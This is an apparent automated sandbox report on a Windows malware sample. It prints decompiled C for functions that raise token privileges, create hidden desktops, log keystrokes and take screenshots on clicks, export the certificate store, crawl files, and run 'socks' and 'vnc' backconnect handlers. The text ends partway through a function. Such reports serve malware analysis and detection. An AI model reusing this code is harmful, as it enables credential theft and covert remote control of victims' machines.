0x00000000
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 00408561
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 00408568
OpenProcessToken.ADVAPI32(000000FF,00000020,J[A,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 0040857A
LookupPrivilegeValueW.ADVAPI32(00000000,J[A,?), ref: 0040859E
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 004085B3
GetLastError.KERNEL32(?,?,?,?,00415B4A,SeTcbPrivilege), ref: 004085BD
CloseHandle.KERNEL32(?,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 004085CC

Strings

J[A, xrefs: 00408558, 00408572, 0040855B, 00408575
J[A, xrefs: 0040858C

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID: J[A$J[A
API String ID: 2724707430-1946466658
Opcode ID: 203217fa76ca3ec5beb62f85faa4907a1d9a1c5929ed13a02210a626fbed7837
Instruction ID: ebf7c0e00b4763a41d2ce7fff3d563090e94b58a61cb159bd475fd83f7f9ddf3
Opcode Fuzzy Hash: 203217fa76ca3ec5beb62f85faa4907a1d9a1c5929ed13a02210a626fbed7837
Instruction Fuzzy Hash: 19015275500208BFEB109FE1DE89EEF7BBCEB10344F00447AB941F11A0EB3589848A39

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF1F, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EF1F(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				struct HWINSTA__* _v16;
				char _v32;
				char _v48;
				void* __esi;
				struct HWINSTA__* _t23;
				WCHAR* _t28;
				int _t35;
				struct HWINSTA__* _t41;
				void* _t43;
				WCHAR* _t45;
				struct HDESK__* _t46;

				_t43 = __ecx;
				_t45 =  &_v32;
				_v5 = 0;
				E00405B00(0xcc, _t45);
				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
				_v12 = _t23;
				if(_t23 != 0) {
					L2:
					_v16 = GetProcessWindowStation();
					if(E0040EEF7(_t50, _v12) == 0) {
						L13:
						CloseWindowStation(_v12);
						L14:
						return _v5;
					}
					_t28 = _a4;
					_a4 = _t28;
					if(_t28 == 0) {
						_t37 =  &_v48;
						_a4 =  &_v48;
						E00405B00(0xcd, _t37);
					}
					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
					if(_t46 != 0) {
						L7:
						if(E0040EEB2(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
							L9:
							_v5 = 1;
							L10:
							CloseDesktop(_t46);
							if(_v5 != 0) {
								goto L13;
							}
							goto L11;
						}
						_t35 = SetThreadDesktop(_t46);
						_v5 = 0;
						if(_t35 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
						_t54 = _t46;
						if(_t46 == 0) {
							L11:
							_t58 = _v16;
							if(_v16 != 0) {
								E0040EEF7(_t58, _v16);
							}
							goto L13;
						}
						goto L7;
					}
				}
				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
				_v12 = _t41;
				_t50 = _t41;
				if(_t41 == 0) {
					goto L14;
				}
				goto L2;
			}

0x0040ef1f
0x0040ef2a
0x0040ef32
0x0040ef35
0x0040ef44
0x0040ef4a
0x0040ef4f
0x0040ef68
0x0040ef71
0x0040ef7b
0x0040f006
0x0040f009
0x0040f00f
0x0040f016
0x0040f016
0x0040ef81
0x0040ef84
0x0040ef89
0x0040ef8b
0x0040ef8e
0x0040ef98
0x0040ef98
0x0040efa9
0x0040efad
0x0040efc3
0x0040efd9
0x0040efe9
0x0040efe9
0x0040efed
0x0040efee
0x0040eff7
0x00000000
0x00000000
0x00000000
0x0040eff7
0x0040efdc
0x0040efe2
0x0040efe7
0x00000000
0x00000000
0x00000000
0x0040efaf
0x0040efbd
0x0040efbf
0x0040efc1
0x0040eff9
0x0040eff9
0x0040effc
0x0040f001
0x0040f001
0x00000000
0x0040effc
0x00000000
0x0040efc1
0x0040efad
0x0040ef57
0x0040ef5d
0x0040ef60
0x0040ef62
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32 ref: 0040EF44
CreateWindowStationW.USER32 ref: 0040EF57
GetProcessWindowStation.USER32 ref: 0040EF68
OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040EFA3
CreateDesktopW.USER32 ref: 0040EFB7
GetCurrentThreadId.KERNEL32 ref: 0040EFC3
GetThreadDesktop.USER32(00000000), ref: 0040EFCA
SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040EFDC
CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040EFEE
CloseWindowStation.USER32(?,?), ref: 0040F009

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
String ID:
API String ID: 2917431391-0
Opcode ID: 76b4b5615bc98ffe0ae667b5d81979de82f4cdde3273d700411f48d377f69307
Instruction ID: 38a931a9904f5a693cfff70754e573348e5c662d2f966472f1e896702e8469e2
Opcode Fuzzy Hash: 76b4b5615bc98ffe0ae667b5d81979de82f4cdde3273d700411f48d377f69307
Instruction Fuzzy Hash: C1215E75800259BFDF206FB69D88A9F7EB8EB48385F00447AF901B3261D6398D55CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE7, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405CE7(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				signed int _t32;
				void* _t36;
				intOrPtr _t39;
				WCHAR* _t45;
				MSG* _t54;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t54 = _a4;
				if(_t54 == 0 || E00412FEE() == 0) {
					L20:
					return TranslateMessage(_t54);
				} else {
					_t25 = _t54->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t54->wParam - 0x1b;
						if(_t54->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
								_push( &_v884);
								L19:
								E00405B4A();
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t54->wParam - 8;
						if(_t54->wParam != 8) {
							goto L17;
						}
						_push(0x404248);
						goto L19;
					}
					EnterCriticalSection(0x4223b8);
					if( *0x4223b0 > 0) {
						 *0x4223b0 =  *0x4223b0 + 0xffff;
						_t36 = 2;
						E00405B00(_t36,  &_v864);
						_t39 = E00411FB9( &_v864, 0x1e, 0x1f4);
						_v900 = _t39;
						if(_t39 != 0) {
							E00405B00(0,  &_v840);
							_t65 =  &_v884;
							E00405B00(1, _t65);
							_t45 =  *0x4223a8; // 0x0
							if(_t45 != 0) {
								_t65 = _t45;
							}
							E00407B78( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E0040ECC5(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x423bd8, GetTickCount());
						}
					}
					LeaveCriticalSection(0x4223b8);
					goto L20;
				}
			}

0x00405ced
0x00405cf4
0x00405cfb
0x00405e3d
0x00405e4a
0x00405d0e
0x00405d0e
0x00405d16
0x00405dcc
0x00405dd1
0x00000000
0x00000000
0x00405dd3
0x00405dd7
0x00000000
0x00000000
0x00405dde
0x00405de4
0x00405de6
0x00000000
0x00000000
0x00405e06
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00405e10
0x00405e13
0x00405e22
0x00405e2c
0x00405e2c
0x00405e2e
0x00405e37
0x00405e38
0x00405e38
0x00000000
0x00405e38
0x00405e24
0x00405e24
0x00405e2a
0x00000000
0x00000000
0x00000000
0x00405e2a
0x00405e15
0x00405e19
0x00000000
0x00000000
0x00405e1b
0x00000000
0x00405e1b
0x00405d21
0x00405d2f
0x00405d3a
0x00405d47
0x00405d48
0x00405d57
0x00405d5c
0x00405d62
0x00405d6a
0x00405d71
0x00405d76
0x00405d7b
0x00405d82
0x00405d84
0x00405d84
0x00405da5
0x00405daa
0x00405db4
0x00405dbc
0x00405dbc
0x00405d62
0x00405dc4
0x00000000
0x00405dc4

APIs

TranslateMessage.USER32(?), ref: 00405E3E

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

EnterCriticalSection.KERNEL32(004223B8), ref: 00405D21
LeaveCriticalSection.KERNEL32(004223B8), ref: 00405DC4

Part of subcall function 00411FB9: LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 00411FEB
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 00411FFC
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00412009
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 00412016
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 00412023
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 00412030
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041203D
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041204A
Part of subcall function 00411FB9: LoadLibraryA.KERNEL32(ole32.dll), ref: 00412092
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041209D
Part of subcall function 00411FB9: LoadLibraryA.KERNEL32(gdi32.dll), ref: 004120AF
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 004120BA
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 004120C6
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 004120D3
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 004120E0
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 004120ED
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 004120FA
Part of subcall function 00411FB9: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00412107

GetTickCount.KERNEL32 ref: 00405D86
GetKeyboardState.USER32(?), ref: 00405DDE
ToUnicode.USER32 ref: 00405E06

Strings

, xrefs: 00405E24

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID:
API String ID: 2762424063-3916222277
Opcode ID: 752a60756699002f5b94db22db133baa0c21dcca33543787eb6313ad9f2c6abc
Instruction ID: 9a1ec78b23e704eb9fb787ac47d41529a85131465b20d14d8f4831bdc132c496
Opcode Fuzzy Hash: 752a60756699002f5b94db22db133baa0c21dcca33543787eb6313ad9f2c6abc
Instruction Fuzzy Hash: 8231E032604701ABDB20AF64DD49A9B77A8EF40740F44483BF994F71E1E778E944CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A581, Relevance: 12.1, APIs: 8, Instructions: 119encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00404B44), ref: 0041A59C
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0041A5B8
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0041A5C4
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0041A603
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0041A633
CharLowerW.USER32(?,?,00000000,00000001), ref: 0041A651
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0041A65C
CertCloseStore.CRYPT32(?,00000000), ref: 0041A6E5

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: 7bb4a91820d45a5ae99b46ada0331db0186f60ecfae6e02f09e686a6b80ee7ce
Instruction ID: 1e1061c97c321da34795b7c3d7611dc820124baefcd28a89a87f2d014ebcd163
Opcode Fuzzy Hash: 7bb4a91820d45a5ae99b46ada0331db0186f60ecfae6e02f09e686a6b80ee7ce
Instruction Fuzzy Hash: 0741C5B1208345ABD710DF65CD40AAFBBECAB88354F04093FBAC4E21A0D638D955C767

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5AE, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040C5AE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E0040C70A("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0040C30F( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0040C70A( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E0040C5AE( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x0040c5cb
0x0040c5cf
0x0040c5d3
0x0040c5da
0x0040c701
0x0040c707
0x0040c707
0x0040c5ed
0x0040c5f3
0x0040c5fa
0x0040c600
0x0040c609
0x0040c609
0x0040c60e
0x00000000
0x00000000
0x0040c630
0x0040c6e0
0x0040c6f1
0x00000000
0x00000000
0x00000000
0x0040c6f1
0x0040c63a
0x0040c63d
0x0040c646
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c64d
0x0040c64d
0x0040c650
0x0040c68d
0x0040c692
0x0040c6b2
0x0040c6b6
0x0040c6bb
0x0040c6bb
0x0040c6db
0x0040c6db
0x00000000
0x0040c692
0x0040c652
0x0040c668
0x0040c66c
0x00000000
0x00000000
0x00000000
0x0040c66e
0x0040c67b
0x0040c67e
0x0040c680
0x00000000
0x00000000
0x0040c682
0x0040c686
0x0040c68b
0x0040c68b
0x00000000
0x0040c686
0x0040c63d
0x0040c6fb
0x0040c6fb

APIs

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C5ED
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040C614
PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040C65E
Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040C68B
Sleep.KERNEL32(00000000,?,?), ref: 0040C6BB
FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040C6E9
FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040C6FB

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: 9a58aaa5927a71cf76b912a259a5c5785ffce04aa8c2e24f505db358aed5e96f
Instruction ID: f9bfacc21a6e90477fc1d0ddf403c8ea6318374d0e5d9bd662873fe9a01bf58c
Opcode Fuzzy Hash: 9a58aaa5927a71cf76b912a259a5c5785ffce04aa8c2e24f505db358aed5e96f
Instruction Fuzzy Hash: E7414D3100420ADBCB21DF54C885A9F7BA5EF54384F104A3AF994A22E1D73AD859DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040812A, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0040C751,00000000,00000000,00000001,F0000040,?,0040C751,?,00000030,?,?,?,0040CC6A,00423E80), ref: 00408143
CryptCreateHash.ADVAPI32(0040C751,00008003,00000000,00000000,00000030,?,0040C751,?,00000030,?,?,?,0040CC6A,00423E80), ref: 0040815B
CryptHashData.ADVAPI32(00000030,00000010,0040C751,00000000,?,0040C751), ref: 00408177
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,0040C751), ref: 0040818F
CryptDestroyHash.ADVAPI32(00000030,?,0040C751), ref: 004081A6
CryptReleaseContext.ADVAPI32(0040C751,00000000,?,0040C751,?,00000030,?,?,?,0040CC6A,00423E80), ref: 004081B0

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
Instruction ID: 88f42cc7b0ca07631ceee7d9af1f09eb1df0b2196e3b319a36da1e3b666e43f9
Opcode Fuzzy Hash: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
Instruction Fuzzy Hash: FB11277180014CBFEF119B90DE84EEE7B7DEB04344F004465F691B51A1C77A8E959B28

Uniqueness

Uniqueness Score: -1.00%

Function 0041D132, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041D132(void* __ecx, CHAR** _a4, signed int _a7) {
				signed int _v6;
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				short _v30;
				intOrPtr _v36;
				char _v44;
				char _v304;
				char _v788;
				char _v792;
				void* __edi;
				void* __esi;
				int _t68;
				signed short _t70;
				signed int _t80;
				void* _t95;
				signed int _t99;
				void* _t102;
				signed int _t108;
				void* _t112;
				CHAR** _t121;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t138;
				signed int _t139;
				void* _t141;

				_t123 = __ecx;
				E00406F38( &_v304,  &_v304, 0, 0x104);
				_t121 = _a4;
				if(lstrcmpiA( *_t121, "socks") != 0) {
					_t68 = lstrcmpiA( *_t121, "vnc");
					__eflags = _t68;
					if(_t68 != 0) {
						_t70 = E00407504( *_t121, _t123, 0);
						_t6 = _t70 - 1; // -1
						_t123 = _t6;
						__eflags = _t6 - 0xfffd;
						if(_t6 > 0xfffd) {
							L32:
							E0040AF86( &_v304);
							_a7 = 0;
							if(_v304 <= 0) {
								L34:
								E00406E85( *_t121);
								E00406E85(_t121[1]);
								E00406E85(_t121[2]);
								E0040A658(_t121[3]);
								E00406E85(_t121);
								return 0;
							} else {
								goto L33;
							}
							do {
								L33:
								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
								_a7 = _a7 + 1;
							} while (_a7 < _v304);
							goto L34;
						}
						_t80 = _t70 & 0x0000ffff;
						_v24 = _t80;
						__eflags = _t80;
						if(_t80 == 0) {
							goto L32;
						}
						L6:
						_t130 = E00409F0E(E00407504(_t121[2], _t123, 0), _t123, _t121[1]);
						_v16 = _t130;
						if(_t130 == 0xffffffff) {
							goto L32;
						}
						E0040A280(_t123, _t130);
						E0040A23E(_t130);
						_t89 = E00407CDC(E00413194(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
						_t144 = _t89;
						if(_t89 == 0) {
							L31:
							E0040A228(_t89, _t130);
							goto L32;
						}
						_v9 = E0040D51D( &_v788, _v36, _t144, _t130, 1, _v44);
						_t89 = E00407CCA( &_v44);
						if(_v9 == 0) {
							goto L31;
						}
						_t89 = E0040A135(0,  &_v16, 0, 0);
						_t130 = _v16;
						if(_t89 != _t130) {
							goto L31;
						}
						while(1) {
							_push(0x7530);
							_push( &_v8);
							_t95 = 4;
							if(E00409E38(_t95, _t130) == 0 || _v8 <= 4) {
								break;
							}
							_t138 = E00406E55(_v8 & 0x0000ffff);
							_push(0x7530);
							if(_t138 == 0) {
								_t127 = _v8 & 0x0000ffff;
								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
								L29:
								_push(_t99);
								_push(_t130);
								_t89 = E00409E80(_t127);
								break;
							}
							_push(_t138);
							_t127 = _t130;
							_t102 = E00409E38((_v8 & 0x0000ffff) - 4, _t130);
							_push(_t138);
							if(_t102 == 0) {
								L35:
								_t89 = E00406E85();
								break;
							}
							_v30 = _v6;
							_v28 =  *_t138;
							E00406E85();
							if(_v6 != 0) {
								_t139 = E00406E55(_v6 & 0x0000ffff);
								_t99 = _v6 & 0x0000ffff;
								_push(0x7530);
								__eflags = _t139;
								if(_t139 == 0) {
									goto L29;
								}
								_push(_t139);
								_t127 = _t130;
								_t108 = E00409E38(_t99, _t130);
								__eflags = _t108;
								if(_t108 == 0) {
									_push(_t139);
									goto L35;
								}
								_v20 = _t139;
								L20:
								if(_v28 == 2 && _v30 == 4) {
									_t112 = 0xc;
									_t131 = E00406E55(_t112);
									if(_t131 != 0) {
										 *_t131 = _a4;
										 *((intOrPtr*)(_t131 + 4)) = _v24;
										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
										if(E0040AF41( &_v304, 0x20000, E0041CEA9, _t131) == 0) {
											E00406E85(_t131);
										}
									}
									E0040AEEF(_t127,  &_v304);
								}
								E00406E85(_v20);
								_t89 = E0040A135(0,  &_v16, 0, 0);
								_t130 = _v16;
								if(_t89 == _t130) {
									continue;
								} else {
									break;
								}
							}
							_v20 = _v20 & 0x00000000;
							goto L20;
						}
						_t121 = _a4;
						goto L31;
					}
					_v24 = 0xfffffffe;
					goto L6;
				}
				_v24 = _v24 | 0xffffffff;
				goto L6;
			}

0x0041d132
0x0041d14c
0x0041d151
0x0041d165
0x0041d174
0x0041d176
0x0041d178
0x0041d187
0x0041d18c
0x0041d18c
0x0041d18f
0x0041d195
0x0041d36e
0x0041d374
0x0041d380
0x0041d384
0x0041d3a5
0x0041d3a7
0x0041d3af
0x0041d3b7
0x0041d3bf
0x0041d3c5
0x0041d3d0
0x00000000
0x00000000
0x00000000
0x0041d386
0x0041d386
0x0041d391
0x0041d397
0x0041d39d
0x00000000
0x0041d386
0x0041d19b
0x0041d19e
0x0041d1a1
0x0041d1a3
0x00000000
0x00000000
0x0041d1a9
0x0041d1bb
0x0041d1bd
0x0041d1c3
0x00000000
0x00000000
0x0041d1ca
0x0041d1d0
0x0041d1ed
0x0041d1f2
0x0041d1f4
0x0041d367
0x0041d369
0x00000000
0x0041d369
0x0041d20b
0x0041d20e
0x0041d217
0x00000000
0x00000000
0x0041d227
0x0041d22c
0x0041d231
0x00000000
0x00000000
0x0041d23c
0x0041d23c
0x0041d240
0x0041d243
0x0041d24d
0x00000000
0x00000000
0x0041d267
0x0041d269
0x0041d26c
0x0041d355
0x0041d359
0x0041d35d
0x0041d35d
0x0041d35e
0x0041d35f
0x00000000
0x0041d35f
0x0041d279
0x0041d27a
0x0041d27c
0x0041d281
0x0041d284
0x0041d3d3
0x0041d3d3
0x00000000
0x0041d3d3
0x0041d28e
0x0041d294
0x0041d297
0x0041d2a1
0x0041d2b2
0x0041d2b4
0x0041d2b8
0x0041d2b9
0x0041d2bb
0x00000000
0x00000000
0x0041d2c1
0x0041d2c2
0x0041d2c4
0x0041d2c9
0x0041d2cb
0x0041d3da
0x00000000
0x0041d3da
0x0041d2d1
0x0041d2d4
0x0041d2d8
0x0041d2e3
0x0041d2e9
0x0041d2ed
0x0041d2f2
0x0041d2f7
0x0041d310
0x0041d31a
0x0041d31d
0x0041d31d
0x0041d31a
0x0041d328
0x0041d328
0x0041d330
0x0041d33f
0x0041d344
0x0041d349
0x00000000
0x0041d34f
0x00000000
0x0041d34f
0x0041d349
0x0041d2a3
0x00000000
0x0041d2a3
0x0041d364
0x00000000
0x0041d364
0x0041d17a
0x00000000
0x0041d17a
0x0041d167
0x00000000

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 0041D161
lstrcmpiA.KERNEL32(?,vnc), ref: 0041D174
CloseHandle.KERNEL32(?), ref: 0041D391

Part of subcall function 0040AF41: SetLastError.KERNEL32(0000009B,004157D2,00000000,00415670,00000000,00423860,00000000,0041348A,00423860,00000000,00000104,74B5F560,00000000), ref: 0040AF4B

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Strings

socks, xrefs: 0041D15A
vnc, xrefs: 0041D16D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
String ID: socks$vnc
API String ID: 3305036421-270151703
Opcode ID: 5e92c35cfec363aa1da3900839a35e12200f317f3cbf8a054dbfbad91739be44
Instruction ID: beb3030c9ad510dead979cb061e80031c99a44befb3141e2b77d97670107d06d
Opcode Fuzzy Hash: 5e92c35cfec363aa1da3900839a35e12200f317f3cbf8a054dbfbad91739be44
Instruction Fuzzy Hash: CF71BEB1C00218AACF11AB65CC41BEE77B5AF45314F0040ABF964B72C1DB3C9E95C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4F3, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C4F3(WCHAR* __ecx, void* __eflags) {
